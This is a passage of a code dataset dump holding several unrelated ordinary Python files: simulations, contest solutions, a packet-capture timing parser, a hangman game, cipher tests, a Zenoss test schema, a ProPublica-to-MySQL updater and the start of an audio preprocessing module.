grid[it.multi_index] = 1\r\n num_x += 1\r\n elif value < x_chance + y_chance:\r\n grid[it.multi_index] = 2\r\n num_y += 1\r\n it.iternext()\r\n del random_grid\r\n\r\n for j in range(num_steps):\r\n delta_x, delta_y = self.get_step_changes(grid, parameters)\r\n num_x += delta_x\r\n num_y += delta_y\r\n result[j, 0] = num_x/num_cells*x_factor\r\n result[j, 1] = num_y/num_cells*y_factor\r\n\r\n result /= self.num_runs\r\n\r\n # define functions to return\r\n def x(t):\r\n # check whether the value of t is not too large or too small\r\n if t < 0 or t > self.max_t:\r\n raise ModelException(\"t={} out of bounds\".format(t))\r\n # find the indices of the nearest points in time for which the amount was computed\r\n index = math.floor(t*steps_per_time)\r\n next_index = math.ceil(t*steps_per_time)\r\n # interpolate\r\n if index == next_index:\r\n return result[index, 0]\r\n else:\r\n return lerp(result[index, 0], result[index+1, 0], t*steps_per_time-index)\r\n\r\n def y(t):\r\n # check whether the value of t is not too large or too 
small\r\n        if t < 0 or t > self.max_t:\r\n            raise ModelException(\"t={} out of bounds\".format(t))\r\n        # find the indices of the nearest points in time for which the amount was computed\r\n        index = math.floor(t*steps_per_time)\r\n        next_index = math.ceil(t*steps_per_time)\r\n        # interpolate\r\n        if index == next_index:\r\n            return result[index, 1]\r\n        else:\r\n            return lerp(result[index, 1], result[index+1, 1], t*steps_per_time-index)\r\n\r\n        return x, y\r\n\r\n    def get_step_changes(self, grid, parameters):\r\n        delta_x = 0\r\n        delta_y = 0\r\n\r\n        for _ in range(self.N):\r\n            # generate random cell and a neighbour\r\n            cell_index = tuple(random.randrange(0, m) for m in self.shape)\r\n            neighbour_axis = random.randrange(0, len(self.shape))\r\n            neighbour_sign = -1 if random.getrandbits(1) else 1\r\n            neighbour_index = tuple((cell_index[i]+neighbour_sign) % self.shape[i]\r\n                                    if i == neighbour_axis else cell_index[i] for i in range(len(self.shape)))\r\n\r\n            # perform the algorithm\r\n            if grid[cell_index] == 2 and grid[neighbour_index] == 1:  # fox eats rabbit\r\n                grid[neighbour_index] = 0\r\n                delta_x -= 1\r\n                if random.random() <= parameters[\"sigma_f\"]:\r\n                    grid[neighbour_index] = 2\r\n                    delta_y += 1\r\n            elif grid[cell_index] == 2 and random.random() <= parameters[\"p_f\"]:  # fox dies\r\n                grid[cell_index] = 0\r\n                delta_y -= 1\r\n            elif grid[cell_index] == 2:  # fox moves to vacancy\r\n                grid[cell_index] = 0\r\n                grid[neighbour_index] = 2\r\n            elif grid[cell_index] == 1 and grid[neighbour_index] == 0:  # rabbit moves or reproduces into vacancy\r\n                if random.random() <= parameters[\"mu\"]:  # rabbit reproduces\r\n                    grid[neighbour_index] = 1\r\n                    delta_x += 1\r\n                else:  # rabbit moves\r\n                    grid[cell_index] = 0\r\n                    grid[neighbour_index] = 1\r\n\r\n        return delta_x, delta_y\r\n","repo_name":"koenbres04/PWSKoenIes2020","sub_path":"PWSKoenIes/CAModels.py","file_name":"CAModels.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24160510911","text":"x = None\nprint(x)\n\nx = 134134.1414124\nprint(type(x))\n\n\nx = [1,2132,4,142,1,41,41]\nprint(x)\n\nfor y in x:\n    print(y)\n\n\ndef my_function():\n    p = 23.1341431\n    print(p / 2.0)\n\n\nmy_function()\n\n\nx = 2\ny = 5\nif(x == 2 or y == 5):\n    print(\"We are int\")\nelse:\n    print(\"almost we did it\")\n\nx = False\nif(x == (not True)):\n    print(\"ok\")\n\na = (1,2,3)\nprint(a)\n\na = \"123\"\nb = int(a)\n\n\ndict = {\n    \"one\":1,\n    \"two\":2,\n    \"three\":3\n}\n\nfor k in dict:\n    print(\"{} is {}\".format(k, dict[k]))","repo_name":"ZahariAT/HackBulgaria2019","sub_path":"week0{1,2}/Testing25022019.py","file_name":"Testing25022019.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23415173901","text":"from threading import currentThread\n\nclass TailRecursiveCall(Exception):\n    pass\n\nclass Rec_f(object):\n    def __init__(self, func):\n        self.tr_d = {}\n        self.func = func\n\n    def __call__(self, *args, **kw):\n        self.args = args\n        self.kw = kw\n        thread = currentThread()\n        if thread not in self.tr_d:\n            self.tr_d[thread] = {}\n            self.tr_d[thread][\"depth\"] = 0\n        self.tr_d[thread][\"depth\"] += 1\n        # Record the arguments passed to function on this thread\n        self.tr_d[thread][\"args\"] = args\n        self.tr_d[thread][\"kw\"] = kw\n        depth = self.tr_d[thread][\"depth\"]\n        # If we are re-entering the same function on the same thread:\n        if depth > 1:\n            # Effectively detours execution to the \"Landing 
Point\",\n # but two execution frames above the current one:\n raise TailRecursiveCall\n over = False\n while not over:\n over = True\n args = self.tr_d[thread][\"args\"]\n kw = self.tr_d[thread][\"kw\"]\n try:\n # Execute the function with the latest arguments for this thread.\n result = self.func(*args, **kw)\n except TailRecursiveCall:\n # Landing point if the function tried to recurse itself.\n # Two execution frames above.\n self.tr_d[thread][\"depth\"] -= 1\n over = False\n self.tr_d[thread][\"depth\"] -= 1\n return result\n\ndef tailrecursive(func):\n return Rec_f(func)\n\n\n\nimport itertools\nimport numpy\n\nfn = '/Users/vivanov/Downloads/A-small-attempt1.in'\n\n\nwith open(fn) as f:\n lines = f.read().splitlines()[1:]\n l = []\n i = 0\n while i < len(lines):\n ans1 = [int(k) for k in lines[i].split(' ')][0] - 1\n i += 1\n a = []\n for j in range(4):\n a.append([int(k) for k in lines[i].split(' ')])\n i += 1\n a1 = numpy.array(a)\n\n ans2 = [int(k) for k in lines[i].split(' ')][0] - 1\n i += 1\n a = []\n for j in range(4):\n a.append([int(k) for k in lines[i].split(' ')])\n i += 1\n a2 = numpy.array(a)\n l.append({ 'ans1' : ans1, 'a1': a1 , 'ans2' : ans2, 'a2': a2})\n\npass\n\n\ndef search(state):\n a1 = state['a1']\n a2 = state['a2']\n ans1 = state['ans1']\n ans2 = state['ans2']\n equals = []\n res = ''\n for i in a1[ans1]:\n for j in a2[ans2]:\n if i == j:\n equals.append(i)\n if len(equals) == 1:\n res = str(equals[0])\n elif len(equals) > 1:\n res = 'Bad magician!'\n else :\n res = 'Volunteer cheated!'\n return res\n\nwith open('out', 'w') as f :\n to_write = []\n for i in range(len(l)):\n to_write.append('Case #%s: %s \\n' %((i+1), search(l[i])))\n f.writelines(to_write)\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/2909.py","file_name":"2909.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29285033662","text":"import json\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nDATA_FILE = \"meter_try4_json\"\nTime = []\nwith open(DATA_FILE, \"r\") as read_data:\n data = json.load(read_data)\ndata_length = len(data)\nprint(\"length:\", data_length)\nprint(\"data type\", type(data))\n\nfor n in range(data_length):\n if 'ip' in data[n]['_source']['layers']:\n ip_src = data[n]['_source']['layers']['ip']['ip.src']\n if ip_src == \"192.168.1.27\":\n if 'rtps' in data[n]['_source']['layers']:\n if 'rtps.sm.id_tree' in data[n]['_source']['layers']['rtps']:\n if 'serializedData' in data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']:\n if 'rtps.issueData' in data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']:\n issueData = data[n]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']['rtps.issueData']\n if \"00:00:40:41\" in issueData :\n t1 = float(data[n]['_source']['layers']['frame']['frame.time_epoch'])\n # print(\"t1 = \", t1)\n for i in range(data_length-n):\n n2 = n+i\n if 'ip' in data[n2]['_source']['layers']:\n ip_src2 = data[n2]['_source']['layers']['ip']['ip.src']\n if ip_src2 == \"192.168.1.13\":\n if 'rtps' in data[n2]['_source']['layers']:\n if 'rtps.sm.id_tree' in data[n2]['_source']['layers']['rtps']:\n if 'serializedData' in data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']:\n if 'rtps.issueData' in data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']:\n issueData2 = 
data[n2]['_source']['layers']['rtps']['rtps.sm.id_tree']['serializedData']['rtps.issueData']\n                                                            if \"00:4f:46:46:00\" in issueData2 :\n                                                                t2 = float(data[n2]['_source']['layers']['frame']['frame.time_epoch'])\n                                                                # print(\"t2 = \", t2)\n                                                                t = t2 - t1\n                                                                Time.append(t)\n                                                                break\n\nprint(Time)\nwith open('Time.json', 'w') as outfile:\n    json.dump(Time, outfile)\n#sns.kdeplot(Time)\n#plt.hist(Time)\nTime = pd.Series(Time, name = \"Elapsed Time\")\nsns.distplot(Time)\nplt.savefig('Time.png')\nplt.show()","repo_name":"Jetudie/practice_data","sub_path":"wireshark_data/meter_relay/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17089590423","text":"N = int(input())\r\nmatrix = [list(input()) for _ in range(N)]\r\n\r\ncnt = 0\r\nfor i in range(N):\r\n    length = 0\r\n    for j in range(N):\r\n        if matrix[i][j] == \".\":\r\n            length += 1\r\n        if matrix[i][j] == \"X\" or j == N-1:\r\n            if length >= 2:\r\n                cnt += 1\r\n            length = 0\r\n\r\ncnt2 = 0\r\nfor i in range(N):\r\n    length = 0\r\n    for j in range(N):\r\n        if matrix[j][i] == \".\":\r\n            length += 1\r\n        if matrix[j][i] == \"X\" or j == N-1:\r\n            if length >= 2:\r\n                cnt2 += 1\r\n            length = 0\r\nprint(cnt, cnt2)","repo_name":"hyoung0/algorithm","sub_path":"백준/Silver/1652. 누울 자리를 찾아라/누울 자리를 찾아라.py","file_name":"누울 자리를 찾아라.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13263245586","text":"from logic import Logic\r\nfrom interface import Interface\r\n\r\nInterface.greetings()\r\n\r\nwhile not Logic.comparison():\r\n    Interface.print_main_interface()\r\n    char = input('Enter a possible letter: ')\r\n    if Logic.len_check(char) and Logic.ord_check(char) :\r\n        Logic.check_input(char)\r\n        print(Logic.word_lst)\r\n        if Logic.word_lst == Logic.word_try_lst:\r\n            print(\"Congratulations, you won! 
\")\r\n break\r\n else:\r\n print('\\n')\r\n print('Вы ввели неправильный символ, используйте кириллицу ')\r\n \r\n \r\n\r\nif Logic.comparison():\r\n print('Вы проиграли :(')\r\n Logic.print_word()","repo_name":"En1ggma/gallows-game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23424607731","text":"import sys\r\nsys.stdout = open(\"out.txt\",\"w\")\r\nsys.stdin = open(\"in.txt\", \"r\")\r\nT = int(input())\r\nfor q in range(T):\r\n C, F, X = map(float, input().split())\r\n time = 0.0\r\n prod = 2.0\r\n done = 0.0\r\n ans = 123253643646444565656\r\n ansopt = 0\r\n while ansopt < 5:\r\n if ans >= time + X / prod:\r\n ans = time + X / prod\r\n else:\r\n ansopt += 1\r\n time += C / prod\r\n prod += F\r\n print(\"Case #%s: %s\"%(q+1, ans))\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_136/2343.py","file_name":"2343.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33996124691","text":"import io\n\nimport pytest\n\nfrom caesar_cypher.caesar_cypher import (\n convert_to_ascii,\n convert_to_int,\n decode_caesar,\n decode_vigenere,\n find_shift,\n get_indices_difference,\n get_key_length,\n get_user_input,\n)\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\", [(\"0 1 2\", \"0 1 2\"), (\"a b c\", \"a b c\")]\n)\ndef test_input(monkeypatch, test_inp_, expected):\n monkeypatch.setattr(\"sys.stdin\", io.StringIO(test_inp_))\n assert get_user_input() == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\", [(\"0 1 2\", [0, 1, 2]), (\"0\", [0]), (\"\", [])]\n)\ndef test_convert_int(test_inp_, expected):\n assert convert_to_int(test_inp_) == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n ([0, 1, 2], \"abc\"),\n ([7, 4, 11, 11, 14], \"hello\"),\n ([2, 7, 4, 4, 18, 4, 2, 0, 10, 4], \"cheesecake\"),\n ],\n)\ndef test_convert_to_ascii(test_inp_, expected):\n assert convert_to_ascii(test_inp_) == expected\n\n\ndef test_find_shift():\n text = \"r d c r t r c r f i j c x t r j c g z y y j w x h t y h m c u n j\"\n assert find_shift(text) == 21\n\n\ndef test_find_not_find_shift():\n text = \"r d c r t r c r f t b c x a r x x h a y y j w x a a y h m c u n j\"\n assert find_shift(text) == 0\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n ((\"r r r\", 21), \"mmm\"),\n ((\"x r j q q x c y f x y d\", 21), \"smells tasty\"),\n (\n (\"u q j f x j c h t r j c y w d c f c x q n h j\", 21),\n \"please come try a slice\",\n ),\n ((\"r r r\", 0), \"rrr\"),\n ],\n)\ndef test_decode_caesar(test_inp_, expected):\n test, shift = test_inp_\n assert decode_caesar(test, shift) == expected\n\n\n@pytest.mark.parametrize(\n \"test_inp_, expected\",\n [\n (\"1\", 1),\n (\"2\", 2),\n (\"3\", 3),\n ],\n)\ndef test_get_key_length(monkeypatch, test_inp_, expected):\n monkeypatch.setattr(\"sys.stdin\", io.StringIO(test_inp_))\n assert get_key_length() == expected\n\n\n@pytest.mark.parametrize(\n \"test_input_, expected\",\n [\n ((\"e a s y\", \"e a s y\"), [0, 0, 0, 0]),\n ((\"l e s s x e a s y\", \"m f t t y f b t z\"), [1, 1, 1, 1, 1, 1, 1, 1, 1]),\n ((\"a b c d\", \"a c c e\"), [0, 1, 0, 1]),\n ((\"t e s t\", \"d i q d\"), [-16, 4, -2, -16]),\n ((\"\", \"\"), []),\n ],\n)\ndef test_indices_differences(test_input_, expected):\n plain, plain_encoded = test_input_\n assert 
get_indices_difference(plain, plain_encoded) == expected\n\n\n@pytest.mark.parametrize(\n \"test_input_, expected\",\n [\n ((\"t h e x k e y w o r d x w a s x a\", [0, 0, 0, 0], 1), \"the keyword was a\"),\n (\n (\"u i f y l f z x p s e y x b t y c\", [1, 1, 1, 1, 1, 1, 1, 1, 1], 1),\n \"the keyword was b\",\n ),\n (\n (\"t i i t x t h p u m d y l p o l x g a n i m i b r\", [0, 1, 0, 1], 2),\n \"this should look familiar\",\n ),\n ((\"c i a b i r h x c c x\", [-16, 4, -2, -16], 3), \"secret test\"),\n ((\"\", [], 1), \"\"),\n ],\n)\ndef test_decode_vigenere(test_input_, expected):\n target_message, indices, key_len = test_input_\n assert decode_vigenere(target_message, indices[:key_len]) == expected\n","repo_name":"ovisb/python-caesar-cypher","sub_path":"tests/test_caesar_cypher.py","file_name":"test_caesar_cypher.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17618199693","text":"from OFS.PropertyManager import PropertyManager\n\nfrom Products.ZenRelations.RelationshipManager import RelationshipManager as RM\nfrom Products.ZenRelations.RelSchema import ToMany, ToManyCont, ToOne\nfrom Products.ZenRelations.Exceptions import ZenRelationsError\n\n\nclass TestBaseClass(RM):\n pass\n\n\nclass DataRoot(TestBaseClass):\n def manage_afterAdd(self, item, container):\n self.zPrimaryBasePath = container.getPhysicalPath()\n TestBaseClass.manage_afterAdd(self, item, container)\n\n\nTS = \"Products.ZenRelations.tests.TestSchema.\"\n\n\nclass Device(TestBaseClass, PropertyManager):\n _properties = (\n {\n \"id\": \"pingStatus\",\n \"type\": \"int\",\n \"mode\": \"w\",\n \"setter\": \"setPingStatus\",\n },\n {\"id\": \"communities\", \"type\": \"lines\", \"mode\": \"w\"},\n )\n _relations = (\n (\"location\", ToOne(ToMany, TS + \"Location\", \"devices\")),\n (\"groups\", ToMany(ToMany, TS + \"Group\", \"devices\")),\n (\"organizer\", ToOne(ToManyCont, TS + \"Organizer\", \"devices\")),\n (\"interfaces\", ToManyCont(ToOne, TS + \"IpInterface\", \"device\")),\n )\n pingStatus = 0\n communities = ()\n\n\nclass Server(Device):\n _relations = (\n (\"admin\", ToOne(ToOne, TS + \"Admin\", \"server\")),\n ) + Device._relations\n\n\nclass IpInterface(TestBaseClass):\n _relations = ((\"device\", ToOne(ToManyCont, TS + \"Device\", \"interfaces\")),)\n beforeDelete = False\n afterAdd = False\n\n def manage_beforeDelete(self, item, container):\n self.beforeDelete = True\n\n def manage_afterAdd(self, item, container):\n if (\n not hasattr(self, \"__primary_parent__\")\n or item.__primary_parent__ != container\n ):\n raise ZenRelationsError(\"__primary_parent__ not set in afterAdd\")\n self.afterAdd = True\n\n\nclass Group(TestBaseClass):\n _relations = ((\"devices\", ToMany(ToMany, TS + \"Device\", \"groups\")),)\n\n\nclass Location(TestBaseClass):\n _relations = ((\"devices\", ToMany(ToOne, TS + \"Device\", \"location\")),)\n\n\nclass Admin(TestBaseClass):\n _relations = ((\"server\", ToOne(ToOne, TS + \"Server\", \"admin\")),)\n\n\nclass Organizer(TestBaseClass):\n _relations = (\n (\"parent\", ToOne(ToManyCont, TS + \"Organizer\", \"children\")),\n (\"children\", ToManyCont(ToOne, TS + \"Organizer\", \"parent\")),\n (\"devices\", ToManyCont(ToOne, TS + \"Device\", \"organizer\")),\n )\n\n def buildOrgProps(self):\n self._setProperty(\"zFloat\", -1.0, type=\"float\")\n self._setProperty(\"zInt\", -1, type=\"int\")\n self._setProperty(\"zString\", \"\", type=\"string\")\n self._setProperty(\"zBool\", True, 
type=\"boolean\")\n self._setProperty(\"zLines\", [\"one\", \"two\"], type=\"lines\")\n self._setProperty(\"zSelect\", \"zLines\", type=\"selection\")\n\n def getZenRootNode(self):\n return self.unrestrictedTraverse(\"/zport/dmd/Orgs\")\n\n\ndef create(context, klass, id):\n \"\"\"create an instance and attach it to the context passed\"\"\"\n inst = klass(id)\n context._setObject(id, inst)\n inst = context._getOb(id)\n return inst\n\n\nbuild = create\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenRelations/tests/TestSchema.py","file_name":"TestSchema.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"33339939661","text":"import requests\nimport os\nimport time\nimport mysql.connector\n# NOTE: DO I CARE ENOUGH TO MAKE SOME SORT OF DATA PRUNING FROM PREVENTING MY DATABASE FROM GROWING INFINETELY?\n# THE TRUTH COME OUT!!! IDK IF I AM !! Team after us: consider that question. Idk if I am worrying too much \n# but >inb4 20gb of data, but like, there's no way it gets that big, right???\n# also the more data we have, the slower the insert bc of the unique query thingie... JUST SAYING!!\n\ndef assign_opensecrets_data(primary_subject):\n return {\n \"Health\": [\"H\", \"Health\", \"Health\"],\n \"Government Operations and Politics\": [\"Z\", \"Joint Candidate Cmtes\", \"Joint Candidate Cmtes\"],\n \"International Affairs\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Congress\": [\"Z\", \"Joint Candidate Cmtes\", \"Joint Candidate Cmtes\"],\n \"Crime and Law Enforcement\": [\"P\", \"Labor\", \"Labor\"],\n \"Taxation\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Armed Forces and National Security\": [\"D\", \"Defense\", \"Defense\"],\n \"Public Lands and Natural Resources\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Education\": [\"W\", \"Other\", \"Other\"],\n \"Transportation and Public Works\": [\"M\", \"Transportation\", \"Transportation\"],\n \"Immigration\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Science, Technology, Communications\": [\"C\", \"Communic/Electronics\", \"Communications/Electronics\"],\n \"Labor and Employment\": [\"P\", \"Labor\", \"Labor\"],\n \"Commerce\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Environmental Protection\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Finance and Financial Sector\": [\"F\", \"Finance/Insur/RealEst\", \"Finance, Insurance & Real Estate\"],\n \"Energy\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Civil Rights and Liberties, Minority Issues\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Agriculture and Food\": [\"A\", \"Agribusiness\", \"Agribusiness\"],\n \"Native Americans\": [\"Q\", \"Ideology/Single-Issue\", \"Ideological/Single-Issue\"],\n \"Economics and Public Finance\": [\"F\", \"Finance/Insur/RealEst\", \"Finance, Insurance & Real Estate\"],\n \"Law\": [\"K\", \"Lawyers & Lobbyists\", \"Lawyers & Lobbyists\"],\n \"Housing and Community Development\": [\"C\", \"Construction\", \"Construction\"],\n \"Emergency Management\": [\"W\", \"Other\", \"Other\"],\n \"Social Welfare\": [\"P\", \"Labor\", \"Labor\"],\n \"Sports and Recreation\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Foreign Trade and International Finance\": [\"N\", \"Misc Business\", \"Misc Business\"],\n \"Families\": [\"Y\", \"Unknown\", 
\"Unknown\"],\n \"Arts, Culture, Religion\": [\"W\", \"Other\", \"Other\"],\n \"Water Resources Development\": [\"E\", \"Energy/Nat Resource\", \"Energy & Natural Resources\"],\n \"Animals\": [\"A\", \"Agribusiness\", \"Agribusiness\"]\n }.get(primary_subject, [\"Z\", \"PROBLEM\", \"PROBLEM\"])\n \ndef find_vote_information(bill_slug, congress_number, chamber):\n response = requests.get(f'https://api.propublica.org/congress/v1/{congress_number}/bills/{bill_slug}.json', headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n if len(response.json()[\"results\"][0][\"votes\"]) > 0:\n for vote in response.json()[\"results\"][0][\"votes\"]:\n if vote[\"chamber\"].lower() == chamber.lower():\n vote_url = vote[\"api_url\"]\n return parse_voter_data(vote_url)\n return None\n\ndef parse_voter_data(vote_url):\n response = requests.get(vote_url, headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n vote_dict = {}\n for position in response.json()[\"results\"][\"votes\"][\"vote\"][\"positions\"]:\n vote_dict[position[\"member_id\"]] = position[\"vote_position\"]\n return {\"vote_dict\":vote_dict, \"raw_response\": response.json()[\"results\"][\"votes\"][\"vote\"], \"vote_uri\": vote_url}\n return None\n\ndef parse_voter_data(vote_url):\n response = requests.get(vote_url, headers=headers_dict)\n if response.ok and response.json()[\"status\"] == \"OK\":\n vote_dict = {}\n for position in response.json()[\"results\"][\"votes\"][\"vote\"][\"positions\"]:\n vote_dict[position[\"member_id\"]] = position[\"vote_position\"]\n return {\"vote_dict\":vote_dict, \"raw_response\": response.json()[\"results\"][\"votes\"][\"vote\"], \"vote_uri\": vote_url}\n return None\n\n\nheaders_dict = {\n 'X-API-key': os.environ[\"PROPUBLICA_API_KEY\"]\n}\nchambers = [\n \"senate\",\n \"house\"\n]\ncongress_numbers = [117, 118, 119] # this means we can do at least 3 cycles xd\ncurrentest_congress = 0\n\nif __name__ == \"__main__\":\n\n member_data = []\n for chamber in chambers:\n for congress_number in congress_numbers:\n time.sleep(3)\n response = requests.get(f\"https://api.propublica.org/congress/v1/{congress_number}/{chamber}/members.json\", headers=headers_dict)\n if response.ok and response.json()[\"status\"] != 'ERROR':\n members = response.json()[\"results\"][0][\"members\"]\n if len(members) > 0:\n currentest_congress = congress_number if congress_number > currentest_congress else currentest_congress\n for member in members:\n member_data.append({\"name\": f\"{member['first_name']} {member['last_name']}\", \"chamber\": chamber, \"congress_no\": congress_number, \"id\":member[\"id\"]})\n else: \n print(\"idk if this year exists lmaooo\")\n\n for member in member_data:\n mydb = mysql.connector.connect(\n host=\"localhost\",\n port=3309,\n user=\"root\", \n password=\"secret\",\n database=\"ftvBackEnd\"\n )\n cursor = mydb.cursor()\n query = \"\"\"\n INSERT IGNORE INTO\n congressperson(id, name, congress_number, senate)\n VALUES \n (%s, %s, %s, %s)\n \"\"\"\n cursor.execute(query, (member[\"id\"], member[\"name\"], member[\"congress_no\"], member[\"chamber\"] == 'senate'))\n mydb.commit()\n mydb.close()\n \n\n vote_data = []\n for offset in range(0, 100, 20):\n print(\"offset: \", offset)\n for chamber in chambers:\n response = requests.get(f'https://api.propublica.org/congress/v1/{currentest_congress}/{chamber}/bills/{\"active\" if chamber.lower == \"house\" else \"passed\"}.json?offset={offset}', headers=headers_dict)\n if response.ok and 
response.json()[\"status\"] == \"OK\":\n bills = response.json()[\"results\"][0][\"bills\"]\n for bill in bills:\n bill_data = {}\n vote_information = find_vote_information(bill[\"bill_slug\"], currentest_congress, chamber)\n bill_data[\"vote_information\"] = vote_information\n if vote_information:\n bill_data[\"vote_date\"] = vote_information[\"raw_response\"][\"date\"]\n bill_data['bill_slug'] = bill['bill_slug']\n bill_data['bill_id'] = bill['bill_id']\n bill_data['bill_number'] = vote_information['raw_response']['bill']['number']\n bill_data['sponsor_id'] = bill[\"sponsor_id\"]\n bill_data['sponsor_uri'] = bill['sponsor_uri']\n bill_data['bill_uri'] = bill['bill_uri']\n bill_data['title'] = bill['title']\n bill_data['latest_action'] = vote_information['raw_response']['bill']['latest_action']\n bill_data['short_title'] = bill['short_title']\n bill_data['primary_subject'] = bill['primary_subject']\n bill_data[\"opensecrets_sector_data\"] = assign_opensecrets_data(bill[\"primary_subject\"])\n vote_data.append(bill_data)\n\n for vote in vote_data:\n bill_insert_query = \"\"\"\n INSERT IGNORE INTO \n bill(id, bill_slug, bill_number, sponsor_id,\n sponsor_uri, bill_uri, title,\n latest_action, short_title, primary_subject,\n opensecrets_sector_prefix, opensecrets_sector,\n opensecrets_sector_long)\n VALUES\n (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, %s)\n \"\"\"\n mydb = mysql.connector.connect(\n host=\"localhost\",\n port=3309,\n user=\"root\", \n password=\"secret\",\n database=\"ftvBackEnd\"\n )\n cursor = mydb.cursor()\n cursor.execute(bill_insert_query, (\n vote['bill_id'],\n vote['bill_slug'],\n vote['bill_number'],\n vote['sponsor_id'],\n vote['sponsor_uri'],\n vote['bill_uri'],\n vote['title'],\n vote['latest_action'],\n vote['short_title'],\n vote['primary_subject'],\n vote[\"opensecrets_sector_data\"][0],\n vote[\"opensecrets_sector_data\"][1],\n vote[\"opensecrets_sector_data\"][2]\n ))\n mydb.commit()\n # vote sesh\n cursor.execute('select * from vote_session where date=%s and bill_id=%s', (vote[\"vote_date\"], vote[\"bill_id\"]))\n if len(cursor.fetchall()) < 1:\n vote_session_query = \"\"\"\n INSERT IGNORE INTO \n vote_session(date, senate, bill_id)\n VALUES\n (%s, %s, %s)\n \"\"\"\n cursor.execute(vote_session_query, (vote[\"vote_date\"], vote[\"vote_information\"][\"raw_response\"][\"chamber\"] == \"Senate\", vote[\"bill_id\"]))\n vote_id = cursor.lastrowid\n votes = vote[\"vote_information\"][\"vote_dict\"]\n vote_query = \"\"\"\n INSERT IGNORE INTO \n vote (congressperson_id, vote_session_id, position)\n VALUES \n (%s, %s, %s)\n \"\"\"\n for vote_response in votes:\n cursor.execute(vote_query, (vote_response, vote_id, votes[vote_response]))\n mydb.commit()\n mydb.close()","repo_name":"FundsToVotes/FTV_2022","sub_path":"serverside/propublica_updater/propublica_updater.py","file_name":"propublica_updater.py","file_ext":"py","file_size_in_byte":11442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8268722713","text":"import sys\nimport subprocess as sp\nimport os\n\nproblem = sys.argv[1]\n\ntest_file = f\"{problem}.test\"\n\n# Check if test file exist\nif (not os.path.isfile(test_file)):\n exit(0)\n\nwith open(f\"{problem}.test\", 'rb') as f:\n content = f.read()\n\ntestcases = content.split(b'\\n\\n')\nfor testcase in testcases:\n assert(testcase.startswith(b\"IN:\\n\"))\n out_idx = testcase.find(b\"OUT:\\n\")\n tc_in = testcase[4:out_idx]\n tc_out = testcase[out_idx+5:]\n \n # Feed target with input and check if 
output is correct\n out = sp.run(problem, input=tc_in, shell=True, stdout=sp.PIPE)\n if (tc_out.strip() == out.stdout.strip()):\n print(\"PASS\")\n else:\n print(\"FAIL\")\n ","repo_name":"3-24/problem-solving","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"21661094720","text":"import multiprocessing as mp\nimport os\nimport time\nfrom multiprocessing.sharedctypes import Synchronized\nfrom typing import *\n\nimport librosa\nimport numpy as np\nimport scipy.signal as signal\nimport torch\nimport tqdm\nfrom pydantic import BaseModel\nfrom scipy.io import wavfile\n\nfrom latopia import f0_extractor, feature_extractor, volume_extractor\nfrom latopia.audio_slicer import Slicer\nfrom latopia.config.dataset import DatasetSubsetConfig\nfrom latopia.diffusion.vocoder import Vocoder\nfrom latopia.logger import set_logger\n\nfrom .base import AudioDataset\nfrom .diffusion import DiffusionAudioDataSubset\n\nlogger = set_logger(__name__)\n\n\nclass WriteWaveTask(BaseModel):\n target_sr: int\n slice: bool = True\n write_mute: bool = True\n subset_config: List[DatasetSubsetConfig]\n\n\nclass F0ExtractTask(BaseModel):\n f0_method: f0_extractor.F0_METHODS_TYPE\n max_workers: int = 1\n 